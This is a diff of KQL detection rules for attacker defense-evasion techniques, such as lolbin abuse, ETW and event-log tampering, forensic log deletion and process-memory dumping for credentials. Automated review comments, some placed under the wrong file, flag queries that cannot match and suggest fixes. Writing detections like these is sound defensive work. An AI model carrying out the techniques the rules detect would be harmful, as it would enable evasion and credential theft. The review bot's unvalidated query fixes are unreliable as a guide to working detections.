@@ -1,10 +1,10 @@ -// Title: DotNet CLR DLL Loaded By Scripting Applications -// Author: omkar72, oscd.community -// Date: 2020-10-14 -// Level: high -// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 - -DeviceImageLoadEvents +// Title: DotNet CLR DLL Loaded By Scripting Applications +// Author: omkar72, oscd.community +// Date: 2020-10-14 +// Level: high +// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 + +DeviceImageLoadEvents | where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql index 9a6896f9..65d774ac 100644 --- a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql +++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql 
@@ -1,12 +1,12 @@ -// Title: Driver Added To Disallowed Images In HVCI - Registry -// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) -// Date: 2023-12-05 -// Level: high -// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended - -DeviceRegistryEvents +// Title: Driver Added To Disallowed Images In HVCI - Registry +// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) +// Date: 2023-12-05 +// Level: high +// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended + +DeviceRegistryEvents | where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql index 5bbc8d51..2c7dc135 100644 --- a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql 
@@ -1,12 +1,12 @@ -// Title: Driver/DLL Installation Via Odbcconf.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: medium -// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. - -DeviceProcessEvents +// Title: Driver/DLL Installation Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. + +DeviceProcessEvents | where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql index 3e8320ef..fccf31b5 100644 --- a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql +++ b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql 
@@ -1,10 +1,10 @@ -// Title: Drop Binaries Into Spool Drivers Color Folder -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-28 -// Level: medium -// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceFileEvents +// Title: Drop Binaries Into Spool Drivers Color Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: medium +// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents | where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/Defense Evasion/dumpminitool_execution.kql index eddb3d35..c2ec9934 100644 --- a/KQL/rules/Defense Evasion/dumpminitool_execution.kql +++ b/KQL/rules/Defense Evasion/dumpminitool_execution.kql 
@@ -1,10 +1,10 @@ -// Title: DumpMinitool Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-04-06 -// Level: medium -// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access - -DeviceProcessEvents +// Title: DumpMinitool Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: medium +// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access + +DeviceProcessEvents | where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql index 56ddc704..48ec75ef 100644 --- a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql +++ b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql 
@@ -1,10 +1,10 @@ -// Title: DumpStack.log Defender Evasion -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-06 -// Level: critical -// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: DumpStack.log Defender Evasion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-06 +// Level: critical +// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql index 2e7b2871..e03bf1a6 100644 --- a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql +++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql 
@@ -1,12 +1,12 @@ -// Title: Dynamic CSharp Compile Artefact -// Author: frack113 -// Date: 2022-01-09 -// Level: low -// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. -// Certain processes are not typically observed compiling C# code, but can do so without touching disk. -// This can be used to unpack a payload for execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.004 - -DeviceFileEvents +// Title: Dynamic CSharp Compile Artefact +// Author: frack113 +// Date: 2022-01-09 +// Level: low +// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. +// Certain processes are not typically observed compiling C# code, but can do so without touching disk. +// This can be used to unpack a payload for execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 + +DeviceFileEvents | where FolderPath endswith ".cmdline" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql index 9ab0a135..7e212732 100644 --- a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql +++ b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql 
@@ -1,14 +1,14 @@
-// Title: Dynamic .NET Compilation Via Csc.EXE
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019-08-24
-// Level: medium
-// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.004
-// False Positives:
-// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897
-// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962
-// - Ansible
-
-DeviceProcessEvents
+// Title: Dynamic .NET Compilation Via Csc.EXE
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-08-24
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897
+// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962
+// - Ansible
+
+DeviceProcessEvents
 | where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine 
contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
index 75b3547f..5ce08bb7 100644
--- a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
+++ b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
@@ -1,12 +1,12 @@
-// Title: Enable Local Manifest Installation With Winget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence
-// False Positives:
-// - Administrators or developers might enable this for testing purposes or to install custom private packages
-
-DeviceRegistryEvents
+// Title: Enable Local Manifest Installation With Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - Administrators or developers might enable this for testing purposes or to install custom private packages
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
index 78ab8562..5dfcfa6a 100644
--- a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
+++ b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
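Review bot: The registry predicate on the context line is written against Sysmon's `Details` rendering and, as far as I can tell, cannot match a Defender for Endpoint event: DeviceRegistryEvents reports a DWORD in RegistryValueData as the decimal string (`"1"`), not `"DWORD (0x00000001)"`, and the value name is carried in the separate RegistryValueName column rather than appended to RegistryKey. As written the rule would silently never fire. A schema-correct form would be `| where RegistryKey endswith "\\AppInstaller" and RegistryValueName =~ "EnableLocalManifestFiles" and RegistryValueData == "1"`; please confirm against a live event, because the same `DWORD (0x...)` pattern is emitted for every registry rule produced by this backend.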
@@ -1,12 +1,12 @@
-// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-11-03
-// Level: medium
-// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Administrative activity
-
-DeviceRegistryEvents
+// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-03
+// Level: medium
+// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrative activity
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
index 4edd6106..a3d551ad 100644
--- a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
+++ b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
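Review bot: Both halves of the predicate on the context line look unmatchable in DeviceRegistryEvents: `RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"` folds the value name into the key path, whereas MDE reports it in RegistryValueName, and `RegistryValueData =~ "DWORD (0x00000001)"` is Sysmon's rendering of a DWORD, not the decimal `"1"` the sensor records. The net effect is a rule that never alerts on the very change it is named for. Suggested form, to be validated against a test write: `| where RegistryKey endswith "\\Microsoft\\WBEM\\CIMOM" and RegistryValueName =~ "AllowAnonymousCallback" and RegistryValueData == "1"`.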
@@ -1,12 +1,12 @@
-// Title: ESXi Syslog Configuration Change Via ESXCLI
-// Author: Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects changes to the ESXi syslog configuration via "esxcli"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012
-// False Positives:
-// - Legitimate administrative activities
-
-DeviceProcessEvents
+// Title: ESXi Syslog Configuration Change Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects changes to the ESXi syslog configuration via "esxcli"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
index d3c5200a..046358e9 100644
--- a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
+++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
@@ -1,13 +1,13 @@
-// Title: ETW Logging Tamper In .NET Processes Via CommandLine
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: high
-// Description: Detects changes to environment variables related to ETW logging via the CommandLine.
-// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: ETW Logging Tamper In .NET Processes Via CommandLine
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: high
+// Description: Detects changes to environment variables related to ETW logging via the CommandLine.
+// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
index 24ad5313..e50564d9 100644
--- a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
+++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
@@ -1,10 +1,10 @@
-// Title: ETW Trace Evasion Activity
-// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019-03-22
-// Level: high
-// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002
-
-DeviceProcessEvents
+// Title: ETW Trace Evasion Activity
+// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-03-22
+// Level: high
+// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql
index 492a3cc1..93c139c6 100644
--- a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql
+++ b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql
@@ -1,10 +1,10 @@
-// Title: EventLog EVTX File Deleted
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: medium
-// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070
-
-DeviceFileEvents
+// Title: EventLog EVTX File Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
 | where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
index 6178d35d..2d878958 100644
--- a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
+++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
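Review bot: The query on the context line never checks `ActionType`, so despite the title "EVTX File Deleted" it matches any DeviceFileEvents record for an `.evtx` under `winevt\Logs` — modifications and renames included — rather than deletions only. That turns an anti-forensics detector into a generic event-log file-activity query and will produce noise unrelated to the T1070 behaviour it is tagged with. The new side should be `| where ActionType == "FileDeleted" and FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"`. The commit only normalises line endings here, so this is a pre-existing backend mapping gap worth fixing at the source of the conversion.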
@@ -1,15 +1,15 @@
-// Title: EVTX Created In Uncommon Location
-// Author: D3F7A5105
-// Date: 2023-01-02
-// Level: medium
-// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
-// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
-// Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002
-// False Positives:
-// - Administrator or backup activity
-// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files
-
-DeviceFileEvents
+// Title: EVTX Created In Uncommon Location
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
+// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
+// Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Administrator or backup activity
+// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". 
See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files
+
+DeviceFileEvents
 | where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql
index 2747b280..c9c09a88 100644
--- a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql
+++ b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql
@@ -1,12 +1,12 @@
-// Title: Exchange PowerShell Cmdlet History Deleted
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-26
-// Level: high
-// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070
-// False Positives:
-// - Possible FP during log rotation
-
-DeviceFileEvents
+// Title: Exchange PowerShell Cmdlet History Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-26
+// Level: high
+// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Possible FP during log rotation
+
+DeviceFileEvents
 | where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
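Review bot: The container-image exclusion in the `not(...)` of the EVTX Created In Uncommon Location query is dead code: no path can satisfy both the outer `FolderPath endswith ".evtx"` and the inner `FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\"`, so evtx files under `C:\ProgramData\Microsoft\Windows\Containers\BaseImages\...\winevt\Logs\` are alerted on instead of suppressed. The directory fragment should be a substring test: `(FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\" and FolderPath contains "\\Windows\\System32\\winevt\\Logs\\")`. The query also has no `ActionType == "FileCreated"` predicate even though the title and description are about creation, so renames and deletions of evtx files outside the default directory fire as well. This hunk's header comment lines begin on the previous page line.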
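Review bot: In the Exchange PowerShell Cmdlet History Deleted query, `FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"` can never be true — FolderPath in DeviceFileEvents is an absolute path beginning with a drive letter — so this high-severity rule will silently never fire. The mid-path fragment needs `contains`, and the deletion the title describes needs an action filter: `| where ActionType == "FileDeleted" and FolderPath contains "_Cmdlet_" and FolderPath contains "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"`. Given this is meant to catch anti-forensics on Exchange servers, a query that matches nothing is worse than a noisy one; worth validating with a test deletion under the Exchange logging directory before the ruleset ships.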
diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
index c56afa86..b556e4c3 100644
--- a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
+++ b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
@@ -1,12 +1,12 @@
-// Title: Execute Files with Msdeploy.exe
-// Author: Beyu Denis, oscd.community
-// Date: 2020-10-18
-// Level: medium
-// Description: Detects file execution using the msdeploy.exe lolbin
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - System administrator Usage
-
-DeviceProcessEvents
+// Title: Execute Files with Msdeploy.exe
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects file execution using the msdeploy.exe lolbin
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
index 762f9ccb..fd3ac9b2 100644
--- a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
